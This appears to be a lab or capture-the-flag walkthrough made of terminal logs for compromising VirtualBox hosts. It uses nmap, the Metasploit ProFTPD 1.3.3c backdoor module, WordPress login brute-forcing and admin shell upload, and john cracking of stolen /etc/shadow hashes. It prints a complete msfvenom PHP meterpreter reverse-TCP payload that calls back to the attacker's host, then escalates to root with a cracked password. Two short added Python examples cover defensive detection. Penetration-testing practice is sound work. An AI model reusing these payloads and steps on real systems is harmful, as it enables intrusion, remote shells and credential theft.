[email protected]:~# nmap -sV -A -v 192.168.1.25
Nmap scan report for 192.168.1.25
Host is up (0.00071s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.3c
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 d6:01:90:39:2d:8f:46:fb:03:86:73:b3:3c:54:7e:54 (RSA)
| 256 f1:f3:c0:dd:ba:a4:85:f7:13:9a:da:3a:bb:4d:93:04 (ECDSA)
|_ 256 12:e2:98:d2:a3:e7:36:4f:be:6b:ce:36:6b:7e:0d:9e (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:9E:1F:89 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Uptime guess: 12.168 days (since Thu Oct 17 09:49:47 2019)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=258 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
- 0.71 ms 192.168.1.25
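An added triage example, not part of the original walkthrough: a small parser for the `nmap -sV` port lines above that compares each banner against a hypothetical watch-list of product versions that should never be exposed. The watch-list, the regex and the function names are this example's own assumptions; the sample input is the scan output from this page.

```python
import re

# Constructed sample: the port lines from the nmap -sV scan above.
NMAP_OUTPUT = """\
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.3c
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
"""

# Hypothetical watch-list of product/version pairs that must never be reachable.
# ProFTPD 1.3.3c is the release whose distribution tarball was found backdoored
# in late 2010 (the proftpd_133c_backdoor module in the msf search below).
WATCH_LIST = {"ProFTPD": {"1.3.3c"}}

PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+"
    r"(?P<service>\S+)\s*(?P<version>.*)$"
)


def parse_services(text):
    """Return one dict (port, proto, state, service, version) per port line."""
    services = []
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if m:
            services.append(m.groupdict())
    return services


def flag_watched(services, watch_list=WATCH_LIST):
    """Compare the first two banner tokens ('Product X.Y') with the watch-list.
    Multi-word product names (e.g. 'Apache httpd') would need a longer key."""
    findings = []
    for svc in services:
        if svc["state"] != "open":
            continue
        tokens = svc["version"].split()
        if len(tokens) < 2:
            continue  # no version string: nmap could not fingerprint it
        product, version = tokens[0], tokens[1]
        if version in watch_list.get(product, ()):
            findings.append((int(svc["port"]), product, version))
    return findings


if __name__ == "__main__":
    for port, product, version in flag_watched(parse_services(NMAP_OUTPUT)):
        print(f"port {port}/tcp: {product} {version} is on the watch-list")
```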
Exploit Search for ProFTPD
msf5 > search proftpd
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/freebsd/ftp/proftp_telnet_iac 2010-11-01 great Yes ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (FreeBSD)
1 exploit/linux/ftp/proftp_sreplace 2006-11-26 great Yes ProFTPD 1.2 - 1.3.0 sreplace Buffer Overflow (Linux)
2 exploit/linux/ftp/proftp_telnet_iac 2010-11-01 great Yes ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (Linux)
3 exploit/linux/misc/netsupport_manager_agent 2011-01-08 average No NetSupport Manager Agent Remote Buffer Overflow
4 exploit/unix/ftp/proftpd_133c_backdoor 2010-12-02 excellent No ProFTPD-1.3.3c Backdoor Command Execution
5 exploit/unix/ftp/proftpd_modcopy_exec 2015-04-22 excellent Yes ProFTPD 1.3.5 Mod_Copy Command Execution
msf5 > use exploit/unix/ftp/proftpd_133c_backdoor
msf5 exploit(unix/ftp/proftpd_133c_backdoor) > show options
Module options (exploit/unix/ftp/proftpd_133c_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 21 yes The target port (TCP)
Exploit target:
Id Name
-- ----
0 Automatic
msf5 exploit(unix/ftp/proftpd_133c_backdoor) > set rhosts 192.168.1.25
rhosts => 192.168.1.25
msf5 exploit(unix/ftp/proftpd_133c_backdoor) > exploit
[email protected]:~/basic1# unshadow passwd shadow > merged
[email protected]:~/basic1# john merged
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: Only 5 candidates buffered for the current salt, minimum 8 needed for performance.
marlinspike (marlinspike)
1g 0:00:00:00 DONE 1/3 (2019-10-29 15:39) 14.28g/s 71.42p/s 71.42c/s 71.42C/s marlinspike..marli
Use the "--show" option to display all of the cracked passwords reliably
Session completed
WordPress Vulnerability
msf5 > use auxiliary/scanner/http/wordpress_login_enum
msf5 auxiliary(scanner/http/wordpress_login_enum) > set username admin
username => admin
msf5 auxiliary(scanner/http/wordpress_login_enum) > set pass_file /usr/share/wordlists/dirb/common.txt
pass_file => /usr/share/wordlists/dirb/common.txt
msf5 auxiliary(scanner/http/wordpress_login_enum) > set targeturi /secret/
targeturi => /secret/
msf5 auxiliary(scanner/http/wordpress_login_enum) > set rhosts 192.168.1.30
rhosts => 192.168.1.30
msf5 auxiliary(scanner/http/wordpress_login_enum) > exploit
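Seen from the web server's side, an added example that is not part of the original post: detection of the login guessing above in Apache access logs. The log lines are constructed, the login URI follows the /secret/ targeturi used here, and the example assumes WordPress's usual wp-login.php behaviour (HTTP 200 re-rendering the form on failure, 302 on success).

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
LOGIN = "/secret/wp-login.php"  # targeturi from the run above + wp-login.php


def _line(ip, ts, method, path, status):  # builds one constructed log line
    return f'{ip} - - [{ts}] "{method} {path} HTTP/1.1" {status} 2931'


# Constructed sample: five failed POSTs (wp-login.php answers 200 and re-renders
# the form), then a 302 (login succeeded) from the same client, plus benign
# traffic from another host.
LOG_LINES = [_line("192.168.1.26", f"30/Oct/2019:16:01:0{i} +0000", "POST", LOGIN, 200)
             for i in range(5)]
LOG_LINES += [_line("192.168.1.26", "30/Oct/2019:16:01:05 +0000", "POST", LOGIN, 302),
              _line("192.168.1.40", "30/Oct/2019:16:03:00 +0000", "GET", "/secret/", 200),
              _line("192.168.1.40", "30/Oct/2019:16:05:00 +0000", "POST", LOGIN, 200)]

def parse_line(line):
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec

def detect_login_bursts(lines, login_path=LOGIN, threshold=5, window=timedelta(minutes=1)):
    """Return {ip: (attempts in window, timestamp of first 302 or None)} for each
    client whose POSTs to the login URI reach `threshold` within `window`."""
    posts = defaultdict(list)
    for rec in filter(None, map(parse_line, lines)):
        if rec["method"] == "POST" and rec["path"] == login_path:
            posts[rec["ip"]].append(rec)
    alerts = {}
    for ip, recs in posts.items():
        recs.sort(key=lambda r: r["ts"])
        for i, start in enumerate(recs):  # sliding window over sorted attempts
            burst = [r for r in recs[i:] if r["ts"] - start["ts"] <= window]
            if len(burst) >= threshold:
                # a 302 inside the burst means one of the guesses worked
                success = next((r["ts"] for r in burst if r["status"] == 302), None)
                alerts[ip] = (len(burst), success)
                break
    return alerts
```

A single client reaching the threshold with a trailing 302 is the signature of a successful guess against an account with a wordlist password, which is what lockout and rate limiting on wp-login.php are meant to stop.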
[email protected]:~/Desktop# msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.26 lport=6565 -f raw
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 1113 bytes
/*<?php /**/ error_reporting(0); $ip = '192.168.1.26'; $port = 6565; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();
msf5 auxiliary(scanner/http/wordpress_login_enum) > use multi/handler
msf5 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.1.26
lhost => 192.168.1.26
msf5 exploit(multi/handler) > set lport 6565
lport => 6565
msf5 exploit(multi/handler) > run
meterpreter > download /etc/shadow
[*] Downloading: /etc/shadow -> shadow
[*] Downloaded 1.27 KiB of 1.27 KiB (100.0%): /etc/shadow -> shadow
[*] download : /etc/shadow -> shadow
meterpreter > download /etc/passwd
[*] Downloading: /etc/passwd -> passwd
[*] Downloaded 2.31 KiB of 2.31 KiB (100.0%): /etc/passwd -> passwd
[*] download : /etc/passwd -> passwd
meterpreter >
[email protected]:~# unshadow passwd shadow > merged
[email protected]:~# john merged
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
No password hashes left to crack (see FAQ)
[email protected]:~# cd ~/.john
[email protected]:~/.john# rm john.pot
[email protected]:~/.john# cd -
/root
[email protected]:~# john merged
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: Only 5 candidates buffered for the current salt, minimum 8 needed for performance.
marlinspike (marlinspike)
1g 0:00:00:00 DONE 1/3 (2019-10-30 16:13) 2.040g/s 10.20p/s 10.20c/s 10.20C/s marlinspike..marli
Use the "--show" option to display all of the cracked passwords reliably
Session completed
python -c 'import pty; pty.spawn("/bin/sh")' (http://netsec.ws/?p=337)
Another Method
msf5 exploit(multi/handler) > use exploit/unix/webapp/wp_admin_shell_upload
msf5 exploit(unix/webapp/wp_admin_shell_upload) > set password admin
password => admin
msf5 exploit(unix/webapp/wp_admin_shell_upload) > set username admin
username => admin
msf5 exploit(unix/webapp/wp_admin_shell_upload) > set targeturi /secret
targeturi => /secret
msf5 exploit(unix/webapp/wp_admin_shell_upload) > set RHOSTS 192.168.1.30
RHOSTS => 192.168.1.30
msf5 exploit(unix/webapp/wp_admin_shell_upload) > exploit
meterpreter > shell
Process 558 created.
Channel 1 created.
sh: 0: getcwd() failed: No such file or directory
sh: 0: getcwd() failed: No such file or directory
python -c 'import pty; pty.spawn("/bin/sh")'
sh: 0: getcwd() failed: No such file or directory
$ su - marlinspike
su - marlinspike
Password: marlinspike
[email protected]:~$ sudo bash
sudo bash
[sudo] password for marlinspike: marlinspike
[email protected]:~# whoami
whoami
root
SSH Walkthrough
[email protected]:~# ssh marlinspike@192.168.1.25
The authenticity of host '192.168.1.25 (192.168.1.25)' can't be established.
ECDSA key fingerprint is SHA256:VpmqtJLBtzleV/ibg84tX0hax9+PC3nojkEOPOVhdJU.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.1.25' (ECDSA) to the list of known hosts.
marlinspike@192.168.1.25's password:
Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.10.0-28-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
593 packages can be updated.
420 updates are security updates.
New release '18.04.3 LTS' available.
Run 'do-release-upgrade' to upgrade to it.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.